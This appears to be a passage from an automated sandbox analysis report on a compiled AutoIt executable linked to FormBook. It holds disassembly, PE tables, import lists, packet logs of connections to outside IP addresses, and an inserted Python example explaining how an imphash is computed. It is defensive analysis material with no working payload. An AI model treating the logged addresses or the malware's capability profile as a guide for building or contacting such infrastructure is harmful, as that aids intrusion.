                                      call 00007FE77C8045FDh
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      lea eax, dword ptr [ecx+04h]
                                      mov dword ptr [ecx], 0049FDD0h
                                      push eax
                                      call 00007FE77C804648h
                                      pop ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      push eax
                                      call 00007FE77C804631h
                                      test byte ptr [ebp+08h], 00000001h
                                      pop ecx
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                       Name | Virtual Address | Virtual Size | Is in Section
                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x60fb4 | .rsrc
                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x135000 | 0x7594 | .reloc
                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                       .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                       .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .rsrc | 0xd4000 | 0x60fb4 | 0x61000 | b654d18ab25c2b3c7765ecb95a6dc106 | False | 0.9161288861146907 | data | 7.822238214648054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .reloc | 0x135000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                       RT_ICON | 0xd44e8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                       RT_ICON | 0xd4610 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                       RT_ICON | 0xd4738 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                       RT_ICON | 0xd4860 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.1617855455833727
                                       RT_ICON | 0xd8a88 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.2598547717842324
                                       RT_ICON | 0xdb030 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.29338649155722324
                                       RT_ICON | 0xdc0d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.4654255319148936
                                       RT_MENU | 0xdc540 | 0x50 | data | English | Great Britain | 0.9
                                       RT_STRING | 0xdc590 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                       RT_STRING | 0xdcb24 | 0x68a | data | English | Great Britain | 0.2735961768219833
                                       RT_STRING | 0xdd1b0 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                       RT_STRING | 0xdd640 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                       RT_STRING | 0xddc3c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                       RT_STRING | 0xde298 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                       RT_STRING | 0xde700 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                       RT_RCDATA | 0xde858 | 0x561e4 | data | | | 1.0003288541135114
                                       RT_GROUP_ICON | 0x134a3c | 0x3e | data | English | Great Britain | 0.8548387096774194
                                       RT_GROUP_ICON | 0x134a7c | 0x14 | data | English | Great Britain | 1.25
                                       RT_GROUP_ICON | 0x134a90 | 0x14 | data | English | Great Britain | 1.15
                                       RT_GROUP_ICON | 0x134aa4 | 0x14 | data | English | Great Britain | 1.25
                                       RT_VERSION | 0x134ab8 | 0x10c | data | English | Great Britain | 0.585820895522388
                                       RT_MANIFEST | 0x134bc4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                       DLL | Import
                                       WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                       VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                       WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                       COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                       MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                       WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                       PSAPI.DLL | GetProcessMemoryInfo
                                       IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                       USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                       UxTheme.dll | IsThemeActive
                                       KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                       USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                       GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                       COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                                       ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                       SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                       ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                       OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
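The "Import Hash" line in the static section (948cc502fe9226992dce9417f952fce3) is computed from exactly this DLL/Import table. The following added example, which is neither pefile nor Joe Sandbox code, implements the published imphash recipe so the relationship is visible: DLL names lower-cased with .dll/.ocx/.sys stripped, function names lower-cased, ordinal imports written as ordN, each dll.function token joined with commas in import-table order, then MD5. pefile also maps well-known ordinals of ws2_32 and oleaut32 to names before hashing; that lookup table is left out. The sample import list is a constructed excerpt of the table above plus one hypothetical ordinal import, so it does not reproduce the report's value.

```python
# Added example (not pefile or Joe Sandbox code): how an imphash is derived from
# a DLL / Import table. Simplification: pefile resolves well-known ws2_32 and
# oleaut32 ordinals to names first; this version always writes them as ordN.
import hashlib

_STRIPPED_EXTENSIONS = (".dll", ".ocx", ".sys")


def normalize_import(dll: str, func) -> str:
    """One 'dll.function' token as imphash sees it (func may be a name or an ordinal)."""
    name = dll.lower()
    for ext in _STRIPPED_EXTENSIONS:
        if name.endswith(ext):
            name = name[: -len(ext)]
            break
    func_name = f"ord{func}" if isinstance(func, int) else func.lower()
    return f"{name}.{func_name}"


def imphash_string(imports) -> str:
    """imports: sequence of (dll, [function_or_ordinal, ...]) in import-table order."""
    return ",".join(normalize_import(dll, f) for dll, funcs in imports for f in funcs)


def imphash(imports) -> str:
    """MD5 of the normalized, comma-joined import string."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


# Constructed excerpt: four WSOCK32 and three KERNEL32 entries from the table above
# in the order listed, plus a hypothetical ordinal import. Not the full table, so this
# does not reproduce 948cc502fe9226992dce9417f952fce3.
SAMPLE_IMPORTS = [
    ("WSOCK32.dll", ["gethostbyname", "recv", "send", "socket"]),
    ("KERNEL32.dll", ["VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"]),
    ("EXAMPLE.DLL", [7]),  # hypothetical import by ordinal
]

if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
```

Two consequences matter for triage. Because the hash covers the import table of the AutoIt interpreter stub rather than anything in the embedded script, every executable compiled with the same AutoIt runtime carries the same imphash: it clusters "compiled AutoIt script", not FormBook or any other payload. And because order is part of the input, a rebuilt binary with one import moved or added gets an unrelated hash, so a pivot on imphash is easy to break in either direction.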
                                       Language of compilation system | Country where language is spoken | Map
                                       English | Great Britain |
                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                       Aug 26, 2024 18:27:33.567845106 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:33.572690010 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:33.572772026 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:33.584745884 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:33.589787960 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087604046 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087625027 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087671041 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087687016 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087701082 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:35.087791920 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:35.087835073 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087851048 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087867022 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087887049 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:35.087883949 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087913990 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.087924004 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:35.088057041 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.088097095 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:35.088231087 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:35.088273048 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:35.092236996 CEST | 49736 | 80 | 192.168.2.4 | 194.233.65.154
                                       Aug 26, 2024 18:27:35.097054005 CEST | 80 | 49736 | 194.233.65.154 | 192.168.2.4
                                       Aug 26, 2024 18:27:50.138086081 CEST | 49738 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:50.143923998 CEST | 80 | 49738 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:50.143994093 CEST | 49738 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:50.152690887 CEST | 49738 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:50.158716917 CEST | 80 | 49738 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:51.031419039 CEST | 80 | 49738 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:51.031676054 CEST | 80 | 49738 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:51.031730890 CEST | 49738 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:51.655409098 CEST | 49738 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:52.674280882 CEST | 49739 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:52.679238081 CEST | 80 | 49739 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:52.679327965 CEST | 49739 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:52.688072920 CEST | 49739 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:52.693140030 CEST | 80 | 49739 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:53.557790995 CEST | 80 | 49739 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:53.557898998 CEST | 80 | 49739 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:53.557957888 CEST | 49739 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:54.202301025 CEST | 49739 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:55.225182056 CEST | 49740 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:55.230034113 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.230134010 CEST | 49740 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:55.239108086 CEST | 49740 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:55.243977070 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.244033098 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.244076014 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.244085073 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.244108915 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.244129896 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.244183064 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.244191885 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:55.244199038 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:56.331223011 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:56.332026005 CEST | 80 | 49740 | 45.157.69.194 | 192.168.2.4
                                       Aug 26, 2024 18:27:56.332108974 CEST | 49740 | 80 | 192.168.2.4 | 45.157.69.194
                                       Aug 26, 2024 18:27:56.749193907 CEST | 49740 | 80 | 192.168.2.4 | 45.157.69.194
                                      Aug 26, 2024 18:27:57.767294884 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:57.772185087 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:57.772260904 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:57.778049946 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:57.782944918 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:58.639003992 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:58.639019012 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:58.639167070 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:58.641519070 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:58.646312952 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:28:04.013533115 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.018480062 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.018551111 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.027951956 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.033602953 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901597023 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901612043 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901621103 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901667118 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.901727915 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901740074 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901748896 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901756048 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901774883 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.901788950 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.901879072 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901921034 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901927948 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.901932955 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.901972055 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.906497955 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.906694889 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.906707048 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.906716108 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.906749964 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.906778097 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.989840031 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.989892006 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.989902020 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.989959002 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.994632959 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.994643927 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.994688988 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.994690895 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.994700909 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.994743109 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.999402046 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.999414921 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.999424934 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.999444008 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.999453068 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.999456882 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.999469042 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:04.999481916 CEST4974380192.168.2.437.187.158.211
